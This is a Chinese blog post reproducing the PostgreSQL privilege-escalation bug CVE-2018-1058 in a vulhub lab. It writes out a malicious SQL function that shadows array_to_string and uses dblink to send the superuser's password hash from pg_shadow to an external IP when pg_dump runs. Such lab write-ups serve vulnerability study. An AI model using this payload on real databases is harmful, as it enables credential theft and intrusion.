CVE-2018-1058 PostgreSQL 提权漏洞复现

CVE-2018-1058 PostgreSQL 提权漏洞复现

PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

启动漏洞环境后,我们先以普通用户 vulhub:vulhub 在本地连接到PostgreSQL数据库。

psql –host your-ip –username vulhub

连接到数据库之后执行如下语句。

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=47.240.75.183 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

我在vps上监听5433端口,等待超级用户触发我们留下的这个“后门”。

模拟root用户在靶场机器下,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。


执行上述命令的同时,“后门”已被触发,vps机器上已收到敏感信息。


赞赏

微信赞赏支付宝赞赏

Zgao

愿有一日,安全圈的师傅们都能用上Zgao写的工具。